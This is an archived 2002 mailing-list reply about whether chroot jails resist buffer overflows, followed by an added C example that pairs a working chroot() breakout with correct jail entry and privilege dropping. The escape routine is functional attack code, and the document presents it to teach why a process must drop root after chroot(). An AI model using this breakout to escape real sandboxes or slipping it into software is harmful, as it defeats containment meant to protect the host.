Vulnerability Development mailing list archives

Re: OT? Are chroots immune to buffer overflows?


From: Jose Nazario <jose () monkey org>
Date: Wed, 22 May 2002 13:50:49 -0400 (EDT)

chroot() and jail() cells are not perfect. while you have reduced the
number of moving parts, parts vulnerable to buffer overflows, you are
still going to have some code that is quite possibly exploitable, via a
{buffer|stack|heap} overflow, a format string exploit, a configuration
issue, what have you. accept this as fact. it is, after all, why you put
the code in the restricted environment, to minimize the damage that will
come when it is abused.

getting out of such an environment is well documented. here are some great
pages on the subject:

        http://www.bpfh.net/simes/computing/chroot-break.html
        http://lists.jammed.com/pen-test/2001/07/0134.html
        http://www.linuxsecurity.com/feature_stories/feature_story-99.html
        http://www.linuxgazette.com/issue30/tag_chroot.html
        http://archives.neohapsis.com/archives/nfr-wizards/1997/11/0091.html
        http://lsd-pl.net/papers.html

search packetstormsecurity.org, etc ... it's not perfect, but well done it's
a severe impediment to abusing the system outright.

___________________________
jose nazario, ph.d.                     jose () monkey org
                                        http://www.monkey.org/~jose/

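Editor's added example (not part of Jose's post, and not code from any of the pages he links): the textbook chroot() breakout that the chroot-break page documents, side by side with the jail-entry sequence that defeats it. Function names, the /tmp/jail-demo scratch path and the uid/gid 65534 are this example's own assumptions. The breakout needs root (CAP_SYS_CHROOT) inside the jail; that is precisely the flaw it relies on, and dropping root after chroot() is what turns the jail into the "severe impediment" the post describes. Linux semantics are assumed.

```c
/* Added example, not the post's code: classic chroot() escape beside a
 * correct jail entry. Needs root to do anything real; unprivileged runs
 * just report EPERM. Linux semantics assumed. */
#define _GNU_SOURCE
#include <errno.h>
#include <grp.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* The textbook escape. Precondition: running as root inside the jail.
 * Returns 0 once the process root is back at the real "/", -1 with
 * errno set on failure. */
int chroot_breakout(const char *scratch)
{
    /* 1. make a subdirectory and chroot() into it WITHOUT chdir(): the
     *    cwd now lies outside the (new) root. */
    if (mkdir(scratch, 0700) != 0 && errno != EEXIST)
        return -1;
    if (chroot(scratch) != 0)
        return -1;
    /* 2. walk up with "..": the kernel only pins ".." at the process
     *    root, and the cwd is no longer beneath it, so this climbs all
     *    the way to the real filesystem root. */
    for (int i = 0; i < 64; i++)
        if (chdir("..") != 0)
            return -1;
    /* 3. re-root at the real "/". */
    return chroot(".");
}

/* Give up root for good. Order matters: supplementary groups first
 * (needs root), then gid, then uid. Refuses to "drop" to uid 0. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (uid == 0) { errno = EINVAL; return -1; }
    if (geteuid() == 0 && setgroups(0, NULL) != 0)
        return -1;
    if (setgid(gid) != 0 || setuid(uid) != 0)
        return -1;
    /* Verify the drop is irreversible: regaining root must fail. */
    if (setuid(0) == 0) { errno = EPERM; return -1; }
    return 0;
}

/* Jail entry done right: chdir() before chroot() so the cwd is inside
 * the new root, chdir("/") afterwards for good measure, then drop root
 * so chroot()/mknod()/ptrace() are off the table for the jailed code. */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    if (uid == 0) { errno = EINVAL; return -1; }
    if (chdir(dir) != 0 || chroot(dir) != 0 || chdir("/") != 0)
        return -1;
    return drop_privileges(uid, gid);
}

int main(void)
{
    const char *jail = "/tmp/jail-demo";   /* assumption: demo path */
    if (mkdir(jail, 0755) != 0 && errno != EEXIST) {
        perror("mkdir");
        return 1;
    }

    /* A weak jail: chroot() but stay root. */
    if (chdir(jail) != 0 || chroot(jail) != 0) {
        perror("chroot (needs root)");
        return 1;
    }
    printf("inside jail, /etc/passwd visible: %s\n",
           access("/etc/passwd", F_OK) == 0 ? "yes" : "no");

    if (chroot_breakout("escape") != 0) {
        perror("breakout");
        return 1;
    }
    printf("after breakout, /etc/passwd visible: %s\n",
           access("/etc/passwd", F_OK) == 0 ? "yes" : "no");

    /* The fix: enter the jail properly and drop root; the same
     * breakout now fails at chroot() with EPERM. */
    if (enter_jail(jail, 65534, 65534) != 0) {   /* assumption: uid/gid */
        perror("enter_jail");
        return 1;
    }
    if (chroot_breakout("escape") != 0)
        printf("breakout as uid %u failed: %s\n",
               (unsigned)getuid(), strerror(errno));
    return 0;
}
```

Run it as root to see the three lines in sequence (nothing visible inside, visible again after the breakout, EPERM after the privilege drop); it leaves /tmp/jail-demo/escape behind, since the process can no longer remove it once root is gone. The point is not the breakout, which is old news, but the ordering in enter_jail(): chdir() first, chroot() second, setgroups()/setgid()/setuid() last, and a check that setuid(0) really fails afterwards.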
